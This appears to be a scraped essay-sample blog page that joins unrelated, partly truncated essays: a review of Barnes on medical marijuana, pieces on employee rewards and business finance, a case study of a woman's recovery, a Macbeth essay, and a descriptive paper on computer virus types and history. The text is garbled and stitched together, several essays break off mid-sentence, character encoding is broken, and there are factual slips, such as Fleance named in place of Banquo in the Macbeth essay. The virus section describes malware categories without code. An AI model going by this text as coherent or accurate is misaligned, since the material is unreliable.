competitive intelligence and the insights and advantages that all types of organizations can get from it. 4. He has also publis

Sunday, August 25, 2019

Article Review written by R. Eric Barnes Essay Example | Topics and Well Written Essays - 1250 words

Article Review written by R. Eric Barnes - Essay Example Barnes attempted to establish several arguments in justifying his claims, particularly by trying to inject conclusions with moral, legal and medical bases. He discussed the properties of THC and its various effects when used, and then claiming that the effectiveness of marijuana in terms of its medical effectiveness is not controversial by describing them as the positive its medicinal properties. He then argued that the controversial argument lies in its medicinal value. He deliberated that the medicinal value corresponds to a normative claim which is controversial due to its implications that the medical benefits will then be far greater than the medical cost such as the side effects as well as the implications that there are no treatments which can be used as alternative, and that will be preferable to use in its stead. He claimed that individuals have interests and rights to safe and effective medical treatments, justifying that rights are an important â€Å"prima facie† wh ich the government must respect as well as enforce, at the same, giving credit to aspects such as positive and negative rights, and then emphasizing his assumptions regarding the responsibilities and rights of the government in the regulation of the sales of this drug to ensure the safety of individual. Barnes tackled some options the federal government may undertake with regards to marijuana, some of which are the removal of marijuana from the list of controlled substances which would entail total freedom to purchase by any individual, another is removing the drug from schedule 1 of controlled substances and then moving it to the schedule 2 category. ... ch would entail total freedom to purchase by any individual, another is removing the drug from schedule 1 of controlled substances and then moving it to the schedule 2 category. He admitted that few options are available to state governments regarding this matter, as their authority, in reality, is supplanted by those of the federal government. He then tackled the issues for allowing the prescription of marijuana, claiming that the side effects of using this drug as a medicine is considerably less than other certain drugs that are currently being prescribed. He also claimed that a certain percentage of patients and doctors have an expressed desire towards its legalization for medicinal purposes. He claimed that marijuana is â€Å"effective, sufficiently safe and endorsed by a significant percentage of the relevant medical community†. According to Barnes, there is not enough reason to stop the government from allowing the legal prescription of marijuana, which then entails that it should allow doctors to do so, particularly to patients suffering from certain ailments. He then addressed several arguments that have been raised against the legalization of marijuana such as how the government should not allow harmful medications to be prescribed, discussing the grounds which have been used to justify this argument. He then addressed the second argument, which states that the government should not allow for the prescription of potentially harmful drugs that are not adequately tested, and tried to refute it be underlining the rapid growth of marijuana usage in the country over the past three decades and then emphasizing the need for legalizing further research and testing. The third argument Barnes tried to address is the practical problems associated the legalization of its

Saturday, August 24, 2019

Employee rewards and management Essay Example | Topics and Well Written Essays - 1500 words

Employee rewards and management - Essay Example Having a well-motivated workforce may be equivalent to better work productivity and success in product salability in the market. Additional advantages are lower level of absenteeism and staff turnovers because the employees are satisfied with their work. This also means that training and recruitment costs are lowered because work positions are always reliably staffed (Dawson, 2009). In motivating and retaining good employees, it is important for management to establish a reward system to ensure that good performance is sustained. The Total Reward system is â€Å"the monetary and nonmonetary return provided to employees in exchange for their time, talents, efforts and results† (Christofferson and King, 2006). Total rewards involves the deliberate integration of key elements such as pay, benefits, learning and development and work environment (Brown, 2001) which all effectively attract, retain and motivate the talent required to achieve desired business results. In addition to t hese elements, Christofferson & King (2006) have added the elements of development and career opportunities which may be equivalent to Brown’s (2001) learning and development; performance and recognition and work-life balance which both belong under the work environment key of Brown’s (2001) framework. Figure 1. Christofferson & King’s Total Rewards Framework Key Elements: Pay The monetary component of the Total Rewards System which includes Base Pay, Annual Bonuses, Long term incentives, Shares and Profit sharing may serve as the most concrete reward an employee can hold, and is the most practical to use to meet his daily needs over time. Research has shown that pay satisfaction and the need for career growth are two of the most important predictors of job satisfaction (Gyanmudra and Vijaykumar, 2007). Individuals who are satisfied with the pay they get and the opportunities for professional advancement find that the costs of leaving their jobs would be greater so they develop positive attitudes towards their jobs and appreciate it for what it gives them. Benefits Receiving benefits such as pension, holidays, perks & flexibility of time may make an employee feel more accepted as part of the organization. Usually, it takes time before one can enjoy such benefits, and having proved oneself worth of such is adequately rewarded. Learning and Development Learning and development opportunities such as training, on the job learning, performance management, career development and succession planning may yield more long-term outcomes for both the employee and the organization. It increases the market value of the employee as he gets regularly updated about current trends in the business and be actively involved in contributing to its growth. Brown & Hunning (2010) claim if an employee adopts a learning goal orientation, he focuses on improving his abilities; a he is likely to have job satisfaction even if he is not intrinsically motivated. This is because of his intrinsic desire for the job due to the learning it brings him. Work Environment The work environment should also bring about rewards for the employee. This includes the organisation culture leadership, communications, involvement, worklife balance and non financial recognition. Maintaining positive work environments means having positive working

Friday, August 23, 2019

UNIT 2, MANAGING FINANCIAL RESOURCES AND DECISIONS Essay

UNIT 2, MANAGING FINANCIAL RESOURCES AND DECISIONS - Essay Example As a financial advisor, the business performance can be evaluated on the basis of the information that is obtained from the owner. In explaining the source of finance for Motors Parts Direct Limited, it is important to understand its meaning for the business. Financing is extremely important for starting a business and draw profit from it. There are various sources of finance when a business is looking for start-up. The need for source of finance varies according to the type of business. For processing a business huge amount of capital is needed (Iowa State University Extension, 2013). The source of finance for a business is basically equity or debt. In case of MPD Ltd only debt financing is used as source of finance. However, there are both long term and long term debt for the business. The short and long term debt instruments for the business are discussed hence forth. From the above table it can be stated that the business has started its operation with the help of loan and overdraft. The two types of debt instruments are noted as the liability for the company (Iowa State University Extension, 2013). This liabilities aims at decreasing the liquidity of the company, if the current asset base is not high; even the business does not have enough cash position to maintain a stable working capital. For maintaining its working capital the company requires short term finance of  £ 1,200,000. He also needs the finance for paying the suppliers and make payment to its employees. He needs the amount as these cash are paid even before payments are received from customers. Loan is a useful source of finance for business, which is provided by a single entity at an interest rate. This interest rate is specified by the lender of the loan and it is not decided on mutual basis. If the lender is a bank then the interest rate depends upon the demand of the loan and the rate that are imposed on the banks by the central banks (Steffan, 2008; Fabozzi, 1998).

Thursday, August 22, 2019

Family and friends Essay Example for Free

Family and friends Essay Katherine had done exercise which was more than necessary. She went to the gym about 5 times a week, which had really been a waste of time, as she was underweight and there was no need for her to exercise. This is because she did not have many calories which needed to be burnt off by exercising. Her diet was mainly made up of; unnourished foods and she did not eat as much as she did not either have the time, or did not enjoy eating at all. She was anorexic and also had the eating disorder of being bulimic. Although, my client is a very clean and hygienic person; she likes working in areas which are clean, and thought this was very important. However, my client was a very heavy smoker and alcoholic. Intellectually:  My client worked 6 days a week and only gets Sundays off to spend with her family and friends. Although, the Sunday Katherine sort off she did not make any use of it as she slept most of the day as she was very tired. My client was a very independent person, and did not at all try to be dependents he did not think she was self-worth and she had a low self esteem. Katherine was often stressing about either work or her family this made her become a very paranoid and anxious person. However she was a very hard working person. Emotionally:  Katherine was always depressed because, she is always being caught up in her work. My client does have the ability to go out and socialize; but feels that she does not have the confidence to go out and make new friends. By doing this she thinks bad of herself, which makes her feel disappointed about herself. Katherine was always sad and unhappy, most of the day which did not improve her motherly skills with her children. Socially:  My client had some friends but didnt have a close nor good relationship with both her family and friends. And had a problem against talking to other people and making new friends, as she did not feel self-worth and didnt have the self-esteem to boost her confidence. She wouldnt organize day trips to enjoy her holidays, and whenever she tried something would go wrong.  AFTER:  My client- Katherine Lewis  But now my client is doing more of this. Physically: Katherine now does a regular amount of exercise. My client takes part in more exercise activities; she has also widened her variety in activities, which has been really good for her physical status. She takes part in things like: swimming, aerobics, dance- for about an hour each session, and jogging, walking for about- 30 minutes each day. Katherine has improved her diet dramatically as, she now eats more than usual and has a very spread out and balanced diet plan. Her diet is mainly made up of now, more nutritious and healthy foods; she also replaced her diet of made up of mostly liquids, to fruits and nuts. On the whole Katherine has a stable weight which is really good for her body, and is slowing becoming a much healthier person from before. Intellectually:  My client now gets up earlier and goes to bed quicker, as this refreshes her for the morning activities which lay ahead of her. This also gives her the opportunity to think straight, and get ready for the challenges which may come ahead of her. She has begun thinking more about the positive things in life, rather than always thinking about the negative sides of things. She has stopped stressing so much about her work and home life, so this gives her a better view upon things, such as how to go solve a problem, or how to spend more time with the family. Her intellectual thinking skills, has improved massively, as she feels more confident about herself. Emotionally:  Katherine goes out more, and opens up her feelings much more than she used to. She feels that she has become a more self-assured person, so this encourages her more to go out and spend some time with her family and friends. My client, who used to feel that she had no one to discuss problems with, has now realised that her family and friends are always there to talk to and to confide with. She used to always be depressed, but now has found resolutions to that, and is happier than before. She emotionally is aware that she has many people around her, who will support and provide her with company if she ever needs it. Overall, my client is a supplementary joyful person, than before.  Socially:  Katherine has now started socializing more than she used to. She invites family and friends over to her house, to get to know them better. This has assisted her a lot, in her socializing skills; she goes out more and has meet many new friends; which are all from different backgrounds. She has the confidence, and the assurance to create a relationship with new people.

Wednesday, August 21, 2019

Macbeth explores ambition and its consequences Essay Example for Free

Macbeth explores ambition and its consequences Essay Macbeth explores ambition and its consequences and I am going to show how he successfully portrays this exploration and where in the play examples of this can be found. In scene three of act one, the witches for the second time in the play are seen. This time they are bragging about their unnatural actions and their powers over the human world. Macbeth and Banquo appear on what Macbeth describes as an unusually, foul and fair day. A foul day would be commenting on the weather but a fair day since they have just been triumphant in a defeat in battle. This description of the day by Macbeth could also mean something else too. It could also represent what is about to happen as well. Fair prophecies are to be told soon, but at the same time they may turn out to be foul. When Macbeth and Banquo confront the witches, they are unsure of what or who they are. Unsure of whether they are mortal or immortal due to the things they are saying and how they appear since they have beards like men. This can be seen when Banquo says, What are these,/ So withered, and so wild in their attire,/ That not look like th inhabitants o th earth,/ And yet ont? Live you, or are you aught/ That man may question? You seem to understand/ By each at once her choppy finger laying/ Upon her skinny lips. You should be women,/ And yet your beards forbid me to interpret/ That you are so. Then each of the witches hail Macbeth in three different ways. The first is Thane of Glamis. The second witch, Thane of Cawdor. The third witch hails Macbeth and speaks of him as King of Scotland thereafter. Banquo then questions the witches as to what they have to say to him. The first two witches build up to the third witchs comment that Banquos descendants will be kings. After this, Macbeth begins to question the witches for more information as to how these prophesies are to come true and how they know this information. All of a sudden the witches vanish into thin air leaving Banquo and Macbeth to talk about what has just happened and what has been said. Ross and Angus (two of Macbeths men) arrive and tell Macbeth of his elevation to Thane of Cawdor, and that the former thane is to be executed for treason. Macbeth and Banquo are in disbelief after being told this since what the witches have told them is really happening. Macbeth is now intent in believing he is to be king due to this occurrence of him becoming Thane of Cawdor. Banquo warns Macbeth that evil is at work even though such good things are being predicted and happening. Banquo is sure there is something sinister behind it all. Macbeth doesnt want to hear what Banquo is telling him and begins to imagine what King of Scotland would mean for him. Macbeth and Banquo decide to let future take care of itself and agree to discuss this matter at a more convenient time. It is already clear that the two men arent in agreement about the situation. Macbeth believes what the witches have told them, since part of what they have already said has come true. Banquo on the other hand is doubtful about what is happening and believes something evil and sinister is happening. Banquo is thinking logically and being very conscious about the current situation. Already ambition and temptation is effecting Macbeths actions and thoughts. Doubtfulness and a disagreement in opinion is the only thing challenging their relationship so far but it could get a lot worse. At this point the reader may feel that Banquo is trying to tell Macbeth to not read too deeply into these prophecies told by the witches since they are believed to be evil by him. But on the other hand Banquo may be regarded as jealous towards Macbeth about his good fortunes that are occurring. I think Banquo being regarded as jealous, is thought of more by Macbeth rather than the reader. Macbeth may see Banquo as a threat since his descendants may challenge Macbeths position in years to come when he believes he shall be king of Scotland. Macbeths ambition within this scene has not yet caused consequences but may do in later scenes to come. When Macbeth enters and Lady Macbeth explains to him what her plans are of killing the king Macbeth does not appear as enthusiastic about the idea and is hesitant. He immediately explains that Duncan will be departing next day. But Lady Macbeth simply says that he shall not see tomorrow and to leave the plans to her. It is understandable for Macbeth not to be all that enthusiastic about the idea of killing the king due to many aspects. These aspects include, Duncan being a relative of Macbeths, the potential of being caught, and also a matter of killing someone just to steal a title which belongs to an ally of his. Ambition from Lady Macbeth seems to be a threat towards Macbeth. Her violent, blistering soliloquies in act one, scene five, testify to her strength of will, which completely eclipses that of her husband. The witches are the cause of Lady Macbeths actions and ideas. Their prophecies have so far influenced both Macbeth and Lady Macbeth, although Lady Macbeth considerably more so at this point within the play. In scene six Duncan arrives at Macbeths castle and is greeted warmly by Lady Macbeth. A very false greeting since the thoughts and ideas running through her mind are far more different than what she is expressing to Duncan in greeting him. This is false sense of security from Lady Macbeth towards Duncan. Ambition is feeding this false sense of security from Lady Macbeth towards Duncan since this is part of her plan to kill the king. Scene seven begins with Macbeth debating to himself the options he has in murdering or not murdering Duncan. He says that the deed would be easy if he could be certain that it would not set in motion a series of terrible consequences. He then considers the reasons why he ought not to kill Duncan. The reasons include: Macbeth is Duncans kinsman, subject and host. For someone to be related to and host someone else, then murder them is seen upon as inconceivable. He then comes to the decision to not kill Duncan since the only thing to drive his actions of killing the king would be his ambition, which he sees as an unreliable guide. Lady Macbeth is now expressing outrage towards Macbeth and trying to gain sympathy from him towards her since she has just told him that he is not providing her with enough love just because he wont kill Duncan. This is a very desperate resort that further expresses Lady Macbeths character towards the audience. Ambition is driving her evil actions. As Macbeth begins to waver after Lady Macbeths insults towards him, she then explains her plan. Immediately after she has explained her plan, Macbeth is surprised by her well thought out plan and her boldness/attitude. He then decides to proceed with the murder. Lady Macbeths attitude and ambition is influencing Macbeth to such an extent as to change his feelings and ideas towards the subject. This emphasises the power of ambition expressed from one person towards another. The witches prophecises and Lady Macbeths ambition together have made Macbeths ideas and opinions change completely. In act two, scene 1, Banquo and Fleance are walking along the hall way of Macbeths castle. Banquo tells his son, Fleance, about him being unable to sleep properly due to cursed thoughts and dreams. This shows that the three witches are having an effect upon Banquo. When Banquo and his son are confronted by Macbeth in the hall way, Banquo speaks of the witches telling some truth. Macbeth replies in an innocent way and says, I think not of them./ Yet when we can entreat an hour to serve,/ We would spend it in some words upon that business Macbeth is telling Banquo a blatant lie about his thoughts and feelings about the witches. Macbeth tells Banquo that he has thought nothing of them since the night they both confronted them. They then both agree to talk about the subject of the witches and their prophecies at a later time. Lady Macbeths plans have made Macbeth lie to his own friend and a great friend of that who he fought with side by side in battle. If Macbeth had told Banquo the truth in that he had been thinking about the witches a lot of the time, Banquo may suspect something when the king is killed in Macbeths own home and then Macbeth becomes king! Banquos knowledge of the witches prophecy makes him both a potential ally and a potential threat to Macbeths plotting. For now, Macbeth seems distrustful of Banquo and pretends to have hardly thought of the witches, but Macbeths desire to discuss the prophecies at some future time suggests that he may have some sort of conspiratorial plans in mind. The appearance of Fleance, Banquos son, serves as a reminder of the witches prediction that Banquos children will sit on the throne of Scotland. We realize that if Macbeth succeeds in the murder of Duncan, he will be driven to still more violence before his crown is secure, and Fleance will be in immediate and mortal danger. Ambition and determination from both Macbeth and Lady Macbeth will drive someone to killing Fleance or Banquo or even both at some point since these characters are potential threats in preventing Macbeth to remaining king of Scotland. As soon as Macbeth and Fleance depart and leave Macbeth alone, Macbeth imagines that he sees a dagger leading/pointing him in the direction to Duncans room. Macbeth tries to grasp the weapon and fails. He wonders whether what he sees is real or a, A dagger of the mind, a false creation,/ Proceeding from the heat-oppressed brain? Macbeth decides that the vision of the dagger was simply a manifestation of his unease over killing Duncan. It is obvious that Macbeth is not overly confident nor enthusiastic about the matter of murdering Duncan but his lover has literally forced him into this position through mockery and ambition. As Macbeth hears the signal of the bell rung by Lady Macbeth he heads off to the kings room and commits the murder and says, I go, and it is done./ The bell invites me./ Hear it not Duncan, for it is knell/ That summons thee to heaven or to hell. This is Macbeths concluding speech before going on to commit the murder of Duncan. In act two at the beginning of scene one, Lady Macbeth is waiting for Macbeth to return, is found contemplating to herself about drugging the kings guards and congratulating herself as to how bold she is to carry out such actions. She also asks herself what gave her such courage, evil or sinister spirits perhaps as she asked for earlier on in the play? She says this at the beginning of scene two act one, That which hath made them drunk hath made me bold;/ What hath quenched them hath given me fire./ Hark! Peace! She obviously doesnt want anyone else to hear what she is saying since she appears startled when Macbeth enters. Macbeth appears dazed and obsessed with thoughts of damnation after committing the murder. Lady Macbeth notices the blood drenched daggers within the hands of Macbeths. She tells him to pull himself together after this dreadful mistake and also shouting, Whos there? What ho! Lady Macbeth warns Macbeth that he may have woken the guards after that silly act of shouting and tells him to return the daggers to the guards as planned. Macbeth refuses and so Lady Macbeth places the daggers next to the guards herself. Effects of shock and disbelief are gradually setting into Macbeth and this can be seen by his type of language spoken. This can be seen when Lady Macbeths tells him to return the daggers and he replies, Ill go no more./ I am afraid to think what I have done./ Look ont again I dare not. Macbeth appears to be unable to face up to what he has done, not even to himself, and is ashamed of himself after carrying out the murder. He is in shock and in denial over the whole situation. Macbeth appears scared and frightened of his own actions and all of this because ambition from Lady Macbeth and Macbeth. As the two go to wash their hands and prepare to get changed into their night clothes there is a knocking on the door of the castle and the murderer and his accomplice frantically get changed so to enable no one to suspect them as the possible murderers. The effect on Lady Macbeth after her trip into Duncans bedroom is particularly striking. She claims that she would have killed Duncan herself except that he resembled her father sleeping. This is the first time Lady Macbeth shows herself to be at all vulnerable. Her comparison of Duncan to her father suggests that despite her desire for power and her harsh chastisement of Macbeth, she sees her king as an authority figure to which she must be loyal. Also after the murdering of Duncan an important aspect to remember is that physical evidence can be washed away, like the blood to be washed off the skin of the hands, but emotional and mental feelings cannot be so easily removed and disposed of. This can be seen a little later in the play when Macbeth begins to act disturbingly and struggles to hold in his feelings. In the first scene of act three, Banquo is summing up the current situation. He has now witnessed two of the witches prophecies coming true, why not the next? If the next prophecy comes true that means Banquos descendants shall become king. Ambition and hope is now feeding Banquos motivation towards believing that the next prophecy shall come true. Macbeth and Lady Macbeth are now attempting to put Banquos mind at ease by inviting him to a feast. Doing this they hope to prevent Banquo getting suspicious about the murder of Duncan and so not think it was Macbeth and Lady Macbeth who were involved in the murder. If they both tried to avoid any sort of contact with Banquo, it would seem suspicious and suspect since he is such a good friend of Macbeths. Macbeth goes onto tell Banquo that they must discuss the problem of Malcom and Donalbain fleeing and therefore possibly intending to plot against the crown. So far, Macbeth is covering is guilt very successfully and appearing genuine and true towards Banquo. A false sense of security is given from Macbeth towards Banquo. When Banquo departs, Macbeth remains on stage and begins a soliloquy. The soliloquy is of Macbeths thoughts about Banquo and the threat he holds with Fleance too. He speaks of how he may have killed Duncan only for their sake in the future to come. He fears killing Duncan has assisted them in becoming king a lot sooner than Macbeth wants. Macbeths best friend is now is worst threat. Banquo and Fleance are a great threat towards Macbeths position of kingship. Macbeths and his Ladys ambition for wanting everything and nothing but the best in kingship is beginning to have its consequences. Macbeth now knows he must get rid of both Banquo and Fleance so to prevent any such threat remaining towards Macbeth and his position as king of Scotland. He speaks with two murderers to whom he had already spoken the day before, assuring them that their misfortunes are Banquos fault. He tries to urge them to take revenge upon Banquo and his family. He tries to persuade the two murderers that if they carry the intended job out, that then proves them to be real men. They agree to the proposed job Macbeth is telling them to do and he stresses to kill both of them, Banquo and Fleance. Macbeth is now needing more people killed (to feed his ambition and determination in becoming king) although not carrying the offence out himself. This may be due to the fact that killing Duncan is taking effect and that Macbeth can not bear to kill another friend of his just for his good. This killing is an act of selfishness, greediness and desperation. He may not be carrying out the murder himself because he feels he is unable to kill such a dear friend and a friend he has fought side by side with in battle. He also may not want to murder Banquo and Fleance because it may appear suspicious if another murder occurs and no witnesses available to say where Macbeth was at the time. If people know where Macbeth is, they cannot suspect him of being guilty for the murder. Macbeth doesnt want to risk being caught by anyone and so has appoint these two men to do the job for him. Macbeth has no hesitation in killing Banquo and Fleance, which shows his ambition and determination is driving his actions. Macbeths conscience is no longer a part of his decisions he makes. Ambition appears to have replaced common sense. He is organising the death of one of his best friends and his friends son just so he can remain as king. Its hard to believe that the murders Macbeth is responsible for (in carrying out and planning) have all been down to prophecies told and Macbeths and Lady Macbeths ambition and determination in making the prophecies happen. Macbeth now appears more able and independent, since Lady Macbeth has had no say in the plan of killing Banquo and Fleance, that we are aware of. Lady Macbeths ambition and determination earlier on in killing Duncan is now consequently making Macbeth more determined to remain king. This is an awful consequence due to the fact that innocent friends and relatives of Macbeths are dying just so Macbeth and Lady Macbeth can preserve their hierarchal status. These are very selfish and ambitious ways of keeping it their own way, the way they want it to be. In scene two, act three, Lady Macbeth is urging Macbeth to put the past behind him due to being uneasy about how Macbeth is. Macbeth hints that he has a plan that is intended to be carried out that evening. He gives no details but he believes she will approve of his plans and actions. Macbeth, through Lady Macbeths eyes, is now appearing to be in full control of making sure that he remains king and she remains queen of Scotland. It is clear that Lady Macbeth is uneasy about it, but she covers her feelings when around Macbeth. After all it was her motivation and ambition that has made Macbeth what he is now both king but at the same time a ruthless killer if needs be just to hold the current position of king. It is clear now that Macbeths ambition is feeding his motivation. In scene four, this is where it all starts to go wrong for Macbeth and for Lady Macbeth too. Macbeth learns that only Banquo was murdered and Fleance escaped from the attempt at killing both. Macbeth is angered at this result and tells himself, There the grown serpent lies;/ the worm thats fled Hath nature that in time will venom breed He basically talks of how Banquo (the grown serpent) lies dead but the younger and growing boy, Fleance (the worm) is still at large and later in life he will pose a threat. Shakespeare refers to the pair as snakes and worms due to the fact that they can strike at any time and are hard to kill or catch. This sums up Fleance perfectly since he could strike at any time and therefore pose a threat, and also is hard to kill. This is disastrous for Macbeth and Lady Macbeth because it is Fleance that must be killed since he is the main threat towards Macbeths kingship. If Banquo survived suspicions would arise, but with Banquo dead and Fleance still alive, suspicions are still going to occur and also the threat is still at large for Macbeth and his lady. As the banquet begins and Macbeth sits down with his friends to eat he finds a ghost of Banquo sat in his seat. Invisible to anyone else at the banquet, Macbeth begins to talk to the ghost in the chair although through the eyes of the people attending the banquet it would appear to be Macbeth talking to a chair. If he starts saying too much he may give away information about murders that they have planned and carried out to the other guests. The side effects of the deception, ambition and lies are now beginning to take effect on Macbeth. He is hallucinating images of his victim which means he is worrying about the matter a great deal. All this is a consequence of over ambitious actions carried out by both Lady Macbeth and Macbeth himself. Shakespeare fundamentally shows ambition in two different ways in Macbeth. He shows how ambition can have dreadful consequences and how it can ruin your life. In Macbeths case he dies which is the ultimate price to pay for his ambition and attempting to change natures course. Shakespeare also shows ambition as a good thing through Banquos actions as he stays level headed and lives life each day at a time. Banquo and his role in Macbeth represent the better side of ambition but Macbeth represents the worst side of ambition. Ambition is generally looked upon as a good aspect to a person, but Shakespeare successfully shows how ambition can be both good and bad and what consequences can occur if you have too much of it in Macbeth.

Tuesday, August 20, 2019

Background Of Studies On Computer Viruses

Background Of Studies On Computer Viruses A computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves. Section 1.2 Background of Studies on Various Computer Viruses Boot Sector Viruses This type of viruses has ability to hide in boot sector. The viruses will load into memory when there is booting system and trying to read from hard disk. Boot sector viruses are more spread since old time when floppy disk was popular. But now we hardly seen them since many of them only can spread through floppy disk. This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk. The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive. Examples of boot viruses include: Polyboot.B, AntiEXE. Companion Viruses Companion Viruses is another kind of viruses. When user computer infect by this sort of viruses, it will create another type file from an existing file in same directory (such as creating file.com from file.exe in the same folder), some companion viruses create file.exe from any folder. It can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they accompany the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses). Some examples include: Stator, Asimov.1539, and Terrax.1069 Encrypted Viruses This type of viruses consists of encrypted malicious code, decrypted module. The viruses use encrypted code technique which make antivirus software hardly to detect them. The antivirus program usually can detect this type of viruses when they try spread by decrypted themselves. Logic Bomb Viruses Logic Bomb Viruses or sometime know as Time Bomb is small piece of malicious code or program which have ability to insert itself to other programs or system and perform specific action when the conditions are met (most Logic Bomb developers use date as conditions). The Logic Bomb does nothing until pre-programmed date is reached. Logic Bomb can perform any malicious things based on pre-programmed within it such as deleting file or displaying unwanted message or lock program and so on. They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs. Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive. Macro Viruses When talking about Macro Viruses, we refer to viruses which infect macro of other applications such as Microsoft Word, Microsoft Excel. The viruses are written in a macro language and use it to distribute themselves. Macro viruses will run automatically when user open document. Usually this type of virus cause harmless to your computer, but instead they are annoying by automatically inserting undesired texts or symbols. Example of Macro Virus: WM.Concept, it was introduced in 1995 the first macro virus that spread through Microsoft Word. And another popular one is Melissa that is first found in 1999, it also can spread through MS Word, Excel and Outlook. Multipartite Viruses Multipartite Viruses is type of viruses which infect user computer on both part boot sector and executable files and programs at the same time, with this condition, the viruses spread faster than boot sector or file infector alone. It changes the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus. Once infected it becomes impossible to locate the original files Example: Ghost ball, the first multipartite virus. Nonresident Viruses This type of viruses is similar to Resident Viruses by using replication of module. Besides that, Nonresident Viruses role as finder module which can infect to files when it found one (it will select one or more files to infect each time the module is executed). Polymorphic Viruses: Polymorphic Virus is similar to encrypted viruses; it can infect files with an encrypted copy of itself. The viruses use difference technique to replicate themselves. Some polymorphic viruses are hardly to detect by antivirus software using virus signature based, because it do not remain any identical after replication. Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system. This makes it impossible for anti-viruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves. Examples include: Elkern, Marburg, Satan Bug, and Tuareg. Resident Viruses Resident Viruses or known as Memory Resident Viruses is malicious module. The viruses can replicate module and installing malicious code into computer memory (RAM). The viruses are commonly classified into two main categories: Fast Infectors and Slow Infectors. This type of virus is a permanent which dwells in the RAM memory. From there it can overcome and interrupt all of the operations executed by the system: corrupting files and programs that are opened, closed, copied, renamed etc. Examples include: Randex, CMJ, Meve, and MrKlunky. Stealth Viruses / Worm Stealth Viruses is some sort of viruses which try to trick anti-virus software by intercepting its requests to the operating system. It has ability to hide itself from some antivirus software programs. Therefore, some antivirus program cannot detect them. A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antivirus. Examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, and Mapson. Section 1.3.1 Research Question 1. How did the diff. types of computer Viruses Created when, where, by whom? 2. How are they attack/work on the end user computers? 3. How we protect ourself from such type of computer viruses? 4. What will be the future trend of computer viruses? Section 1.3.2 Research Aim The research aims at understanding how Computer viruses is evolving and attacking on day to day computer business Section 1.3.3 Research Objective The objective of this research is to help to the User of Computer to make decisions on the how to solved the problem created because of computer viruses from a long time perspectives.Also to develop contrasting measure between the creator of computer viruses and the end user of the computer. Section 1.3.4 Research Hypothesis Many of the viruses that have had the greatest impact have been intended to be totally benign. Unfortunately, small errors in program code have led to disastrous results. The most frequent such error is when a virus program, which was intended to infect a computer only once, doesnt realize it has already done its job, and keeps infecting the computer over and over. This was the problem with the infamous virus released at Cornell University on November 2, 1988, by Robert Morris, Jr., which rapidly brought the entire Internet system of computers to its knees. Where the small drain of a single virus can pass unnoticed by a computer system, millions of viruses can fill every bit of memory and use up every cycle of computing power of the computer they have invaded. The hidden message revealed by the widely publicized cases of infection by computer viruses is that existing computer systems of all sorts could be making very large errors that have never been recognized. This means the computer systems that take care of every aspect of the worlds financial life, computer systems that keep personal records on you and me, computer systems that support the military capabilities of the super-powers. Good system developers test systems thoroughly before installation, attempting to test every possible logic path. However, with a system of any reasonable level of complexity, this is an impossible task, so a major system is likely only to have been thoroughly tested for frequently occurring events. Its the infrequently occurring events, and especially the unforeseen combinations of events, that are the bane of systems developers. And those are also the areas where Poincares admonition is most likely to come into play. Chapter 2 Literature Review What is Computer virus? Term was first used by Fred Cohen in 1984. A computer virus is a small program a computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves History of Computer viruses The first academic work on the theory of computer viruses (although the term computer virus was not invented at that time) was done by John von Neumann in 1949 that held lectures at the University of Illinois about the Theory and Organization of Complicated Automata. The work of von Neumann was later published as the Theory of self-reproducing automata In his essay von Neumann postulated that a computer program could reproduce. In 1972 Veith Risak published his article Selbstreproduzierende Automaton mitt minimaler Informationsà ¼bertragung (Self-reproducing automata with minimal information exchange). The article describes a fully functional virus written in assembler language for a SIEMENS 4004/35 computer system. In 1984 Fred Cohen from the University of Southern California wrote his paper Computer Viruses Theory and Experiments It was the first paper to explicitly call a self-reproducing program a virus; a term introduced by his mentor Leonard Adelman. An article that describes useful virus functionalities was published by J. B. Gunn under the title Use of virus functions to provide a virtual APL interpreter under user control in 1984. Science 